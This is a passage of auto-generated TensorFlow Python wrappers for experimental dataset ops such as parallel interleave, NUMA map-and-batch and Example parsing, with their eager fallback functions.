"ExperimentalMatchingFilesDataset", name,
_ctx._post_execution_callbacks, patterns)
return _result
except _core._FallbackException:
try:
return experimental_matching_files_dataset_eager_fallback(
patterns, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalMatchingFilesDataset", patterns=patterns, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"ExperimentalMatchingFilesDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalMatchingFilesDataset(patterns, name=None):
return experimental_matching_files_dataset(patterns=patterns, name=name)
ExperimentalMatchingFilesDataset.__doc__ = experimental_matching_files_dataset.__doc__
ExperimentalMatchingFilesDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalMatchingFilesDataset))
tf_export("raw_ops.ExperimentalMatchingFilesDataset")(ExperimentalMatchingFilesDataset)
def experimental_matching_files_dataset_eager_fallback(patterns, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_matching_files_dataset
"""
_ctx = ctx if ctx else _context.context()
patterns = _ops.convert_to_tensor(patterns, _dtypes.string)
_inputs_flat = [patterns]
_attrs = None
_result = _execute.execute(b"ExperimentalMatchingFilesDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalMatchingFilesDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_materialized_index_dataset_handle(container, shared_name, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
container: A `string`.
shared_name: A `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalMaterializedIndexDatasetHandle", name,
_ctx._post_execution_callbacks, "container", container, "shared_name",
shared_name, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_materialized_index_dataset_handle_eager_fallback(
container=container, shared_name=shared_name,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
container = _execute.make_str(container, "container")
shared_name = _execute.make_str(shared_name, "shared_name")
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_materialized_index_dataset_handle' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_materialized_index_dataset_handle' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalMaterializedIndexDatasetHandle", container=container,
shared_name=shared_name,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("container", _op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalMaterializedIndexDatasetHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalMaterializedIndexDatasetHandle(container, shared_name, output_types, output_shapes, name=None):
return experimental_materialized_index_dataset_handle(container=container, shared_name=shared_name, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalMaterializedIndexDatasetHandle.__doc__ = experimental_materialized_index_dataset_handle.__doc__
ExperimentalMaterializedIndexDatasetHandle = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalMaterializedIndexDatasetHandle))
tf_export("raw_ops.ExperimentalMaterializedIndexDatasetHandle")(ExperimentalMaterializedIndexDatasetHandle)
def experimental_materialized_index_dataset_handle_eager_fallback(container, shared_name, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_materialized_index_dataset_handle
"""
_ctx = ctx if ctx else _context.context()
container = _execute.make_str(container, "container")
shared_name = _execute.make_str(shared_name, "shared_name")
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_materialized_index_dataset_handle' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_materialized_index_dataset_handle' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_inputs_flat = []
_attrs = ("container", container, "shared_name", shared_name,
"output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalMaterializedIndexDatasetHandle", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalMaterializedIndexDatasetHandle", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_max_intra_op_parallelism_dataset(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None):
r"""Creates a dataset that overrides the maximum intra-op parallelism.
Args:
input_dataset: A `Tensor` of type `variant`.
max_intra_op_parallelism: A `Tensor` of type `int64`.
Identifies the maximum intra-op parallelism to use.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalMaxIntraOpParallelismDataset", name,
_ctx._post_execution_callbacks, input_dataset,
max_intra_op_parallelism, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_max_intra_op_parallelism_dataset_eager_fallback(
input_dataset, max_intra_op_parallelism,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalMaxIntraOpParallelismDataset", input_dataset=input_dataset,
max_intra_op_parallelism=max_intra_op_parallelism,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalMaxIntraOpParallelismDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalMaxIntraOpParallelismDataset(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None):
return experimental_max_intra_op_parallelism_dataset(input_dataset=input_dataset, max_intra_op_parallelism=max_intra_op_parallelism, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalMaxIntraOpParallelismDataset.__doc__ = experimental_max_intra_op_parallelism_dataset.__doc__
ExperimentalMaxIntraOpParallelismDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalMaxIntraOpParallelismDataset))
tf_export("raw_ops.ExperimentalMaxIntraOpParallelismDataset")(ExperimentalMaxIntraOpParallelismDataset)
def experimental_max_intra_op_parallelism_dataset_eager_fallback(input_dataset, max_intra_op_parallelism, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_max_intra_op_parallelism_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_max_intra_op_parallelism_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
max_intra_op_parallelism = _ops.convert_to_tensor(max_intra_op_parallelism, _dtypes.int64)
_inputs_flat = [input_dataset, max_intra_op_parallelism]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalMaxIntraOpParallelismDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalMaxIntraOpParallelismDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_non_serializable_dataset(input_dataset, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_dataset: A `Tensor` of type `variant`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalNonSerializableDataset", name,
_ctx._post_execution_callbacks, input_dataset, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_non_serializable_dataset_eager_fallback(
input_dataset, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_non_serializable_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_non_serializable_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalNonSerializableDataset", input_dataset=input_dataset,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalNonSerializableDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalNonSerializableDataset(input_dataset, output_types, output_shapes, name=None):
return experimental_non_serializable_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalNonSerializableDataset.__doc__ = experimental_non_serializable_dataset.__doc__
ExperimentalNonSerializableDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalNonSerializableDataset))
tf_export("raw_ops.ExperimentalNonSerializableDataset")(ExperimentalNonSerializableDataset)
def experimental_non_serializable_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_non_serializable_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_non_serializable_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_non_serializable_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalNonSerializableDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalNonSerializableDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_numa_map_and_batch_dataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
r"""Creates a dataset that fuses mapping with batching.
Creates a dataset that applies `f` to the outputs of `input_dataset` and then
batches `batch_size` of them.
Unlike a "MapDataset", which applies `f` sequentially, this dataset invokes up
to `batch_size * num_parallel_batches` copies of `f` in parallel.
Unlike "MapAndBatchDatasetV2", this dataset uses a NUMA-aware thread scheduling
policy. Because it uses the single-threaded executor, it only supports the
function-based control flow ops.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when building a closure
for `f`.
batch_size: A `Tensor` of type `int64`.
A scalar representing the number of elements to accumulate in a
batch. It determines the number of concurrent invocations of `f` that process
elements from `input_dataset` in parallel.
num_parallel_calls: A `Tensor` of type `int64`.
A scalar representing the maximum number of parallel invocations of the `map_fn`
function. Applying the `map_fn` on consecutive input elements in parallel has
the potential to improve input pipeline throughput.
drop_remainder: A `Tensor` of type `bool`.
A scalar representing whether the last batch should be dropped in case its size
is smaller than desired.
f: A function decorated with @Defun.
A function to apply to the outputs of `input_dataset`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
preserve_cardinality: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalNumaMapAndBatchDataset", name,
_ctx._post_execution_callbacks, input_dataset, other_arguments,
batch_size, num_parallel_calls, drop_remainder, "f", f,
"output_types", output_types, "output_shapes", output_shapes,
"preserve_cardinality", preserve_cardinality)
return _result
except _core._FallbackException:
try:
return experimental_numa_map_and_batch_dataset_eager_fallback(
input_dataset, other_arguments, batch_size, num_parallel_calls,
drop_remainder, f=f, output_types=output_types,
output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_numa_map_and_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_numa_map_and_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalNumaMapAndBatchDataset", input_dataset=input_dataset,
other_arguments=other_arguments,
batch_size=batch_size,
num_parallel_calls=num_parallel_calls,
drop_remainder=drop_remainder,
f=f, output_types=output_types,
output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
"output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "preserve_cardinality",
_op.get_attr("preserve_cardinality"))
_execute.record_gradient(
"ExperimentalNumaMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalNumaMapAndBatchDataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
return experimental_numa_map_and_batch_dataset(input_dataset=input_dataset, other_arguments=other_arguments, batch_size=batch_size, num_parallel_calls=num_parallel_calls, drop_remainder=drop_remainder, f=f, output_types=output_types, output_shapes=output_shapes, preserve_cardinality=preserve_cardinality, name=name)
ExperimentalNumaMapAndBatchDataset.__doc__ = experimental_numa_map_and_batch_dataset.__doc__
ExperimentalNumaMapAndBatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalNumaMapAndBatchDataset))
tf_export("raw_ops.ExperimentalNumaMapAndBatchDataset")(ExperimentalNumaMapAndBatchDataset)
def experimental_numa_map_and_batch_dataset_eager_fallback(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_numa_map_and_batch_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_numa_map_and_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_numa_map_and_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
drop_remainder = _ops.convert_to_tensor(drop_remainder, _dtypes.bool)
_inputs_flat = [input_dataset] + list(other_arguments) + [batch_size, num_parallel_calls, drop_remainder]
_attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
output_types, "output_shapes", output_shapes, "preserve_cardinality",
preserve_cardinality)
_result = _execute.execute(b"ExperimentalNumaMapAndBatchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalNumaMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_parallel_interleave_dataset(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None):
r"""Creates a dataset that applies `f` to the outputs of `input_dataset`.
The resulting dataset is similar to the `InterleaveDataset`, with the exception
that if retrieving the next value from a dataset would cause the requester to
block, it will skip that input dataset. This dataset is especially useful
when loading data from a variable-latency datastores (e.g. HDFS, GCS), as it
allows the training step to proceed so long as some data is available.
!! WARNING !! This dataset is not deterministic!
Args:
input_dataset: A `Tensor` of type `variant`.
other_arguments: A list of `Tensor` objects.
cycle_length: A `Tensor` of type `int64`.
block_length: A `Tensor` of type `int64`.
sloppy: A `Tensor` of type `bool`.
buffer_output_elements: A `Tensor` of type `int64`.
prefetch_input_elements: A `Tensor` of type `int64`.
f: A function decorated with @Defun.
A function mapping elements of `input_dataset`, concatenated with
`other_arguments`, to a Dataset variant that contains elements matching
`output_types` and `output_shapes`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalParallelInterleaveDataset", name,
_ctx._post_execution_callbacks, input_dataset, other_arguments,
cycle_length, block_length, sloppy, buffer_output_elements,
prefetch_input_elements, "f", f, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_parallel_interleave_dataset_eager_fallback(
input_dataset, other_arguments, cycle_length, block_length,
sloppy, buffer_output_elements, prefetch_input_elements, f=f,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_parallel_interleave_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_parallel_interleave_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalParallelInterleaveDataset", input_dataset=input_dataset,
other_arguments=other_arguments,
cycle_length=cycle_length,
block_length=block_length,
sloppy=sloppy,
buffer_output_elements=buffer_output_elements,
prefetch_input_elements=prefetch_input_elements,
f=f,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
"output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalParallelInterleaveDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalParallelInterleaveDataset(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None):
return experimental_parallel_interleave_dataset(input_dataset=input_dataset, other_arguments=other_arguments, cycle_length=cycle_length, block_length=block_length, sloppy=sloppy, buffer_output_elements=buffer_output_elements, prefetch_input_elements=prefetch_input_elements, f=f, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalParallelInterleaveDataset.__doc__ = experimental_parallel_interleave_dataset.__doc__
ExperimentalParallelInterleaveDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalParallelInterleaveDataset))
tf_export("raw_ops.ExperimentalParallelInterleaveDataset")(ExperimentalParallelInterleaveDataset)
def experimental_parallel_interleave_dataset_eager_fallback(input_dataset, other_arguments, cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements, f, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_parallel_interleave_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_parallel_interleave_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_parallel_interleave_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
cycle_length = _ops.convert_to_tensor(cycle_length, _dtypes.int64)
block_length = _ops.convert_to_tensor(block_length, _dtypes.int64)
sloppy = _ops.convert_to_tensor(sloppy, _dtypes.bool)
buffer_output_elements = _ops.convert_to_tensor(buffer_output_elements, _dtypes.int64)
prefetch_input_elements = _ops.convert_to_tensor(prefetch_input_elements, _dtypes.int64)
_inputs_flat = [input_dataset] + list(other_arguments) + [cycle_length, block_length, sloppy, buffer_output_elements, prefetch_input_elements]
_attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalParallelInterleaveDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalParallelInterleaveDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_parse_example_dataset(input_dataset, num_parallel_calls, dense_defaults, sparse_keys, dense_keys, sparse_types, dense_shapes, output_types, output_shapes, sloppy=False, name=None):
r"""Transforms `input_dataset` containing `Example` protos as vectors of DT_STRING into a dataset of `Tensor` or `SparseTensor` objects representing the parsed features.
Args:
input_dataset: A `Tensor` of type `variant`.
num_parallel_calls: A `Tensor` of type `int64`.
dense_defaults: A list of `Tensor` objects with types from: `float32`, `int64`, `string`.
A dict mapping string keys to `Tensor`s.
The keys of the dict must match the dense_keys of the feature.
sparse_keys: A list of `strings`.
A list of string keys in the examples features.
The results for these keys will be returned as `SparseTensor` objects.
dense_keys: A list of `strings`.
A list of Ndense string Tensors (scalars).
The keys expected in the Examples features associated with dense values.
sparse_types: A list of `tf.DTypes` from: `tf.float32, tf.int64, tf.string`.
A list of `DTypes` of the same length as `sparse_keys`.
Only `tf.float32` (`FloatList`), `tf.int64` (`Int64List`),
and `tf.string` (`BytesList`) are supported.
dense_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`).
List of tuples with the same length as `dense_keys`.
The shape of the data for each dense feature referenced by `dense_keys`.
Required for any input tensors identified by `dense_keys`. Must be
either fully defined, or may contain an unknown first dimension.
An unknown first dimension means the feature is treated as having
a variable number of blocks, and the output shape along this dimension
is considered unknown at graph build time. Padding is applied for
minibatch elements smaller than the maximum number of blocks for the
given feature along this dimension.
output_types: A list of `tf.DTypes` that has length `>= 1`.
The type list for the return values.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
The list of shapes being produced.
sloppy: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalParseExampleDataset", name,
_ctx._post_execution_callbacks, input_dataset, num_parallel_calls,
dense_defaults, "sparse_keys", sparse_keys, "dense_keys", dense_keys,
"sparse_types", sparse_types, "dense_shapes", dense_shapes,
"output_types", output_types, "output_shapes", output_shapes,
"sloppy", sloppy)
return _result
except _core._FallbackException:
try:
return experimental_parse_example_dataset_eager_fallback(
input_dataset, num_parallel_calls, dense_defaults,
sparse_keys=sparse_keys, dense_keys=dense_keys,
sparse_types=sparse_types, dense_shapes=dense_shapes,
output_types=output_types, output_shapes=output_shapes,
sloppy=sloppy, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(sparse_keys, (list, tuple)):
raise TypeError(
"Expected list for 'sparse_keys' argument to "
"'experimental_parse_example_dataset' Op, not %r." % sparse_keys)
sparse_keys = [_execute.make_str(_s, "sparse_keys") for _s in sparse_keys]
if not isinstance(dense_keys, (list, tuple)):
raise TypeError(
"Expected list for 'dense_keys' argument to "
"'experimental_parse_example_dataset' Op, not %r." % dense_keys)
dense_keys = [_execute.make_str(_s, "dense_keys") for _s in dense_keys]
if not isinstance(sparse_types, (list, tuple)):
raise TypeError(
"Expected list for 'sparse_types' argument to "
"'experimental_parse_example_dataset' Op, not %r." % sparse_types)
sparse_types = [_execute.make_type(_t, "sparse_types") for _t in sparse_types]
if not isinstance(dense_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'dense_shapes' argument to "
"'experimental_parse_example_dataset' Op, not %r." % dense_shapes)
dense_shapes = [_execute.make_shape(_s, "dense_shapes") for _s in dense_shapes]
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_parse_example_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_parse_example_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if sloppy is None:
sloppy = False
sloppy = _execute.make_bool(sloppy, "sloppy")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalParseExampleDataset", input_dataset=input_dataset,
num_parallel_calls=num_parallel_calls,
dense_defaults=dense_defaults,
sparse_keys=sparse_keys,
dense_keys=dense_keys,
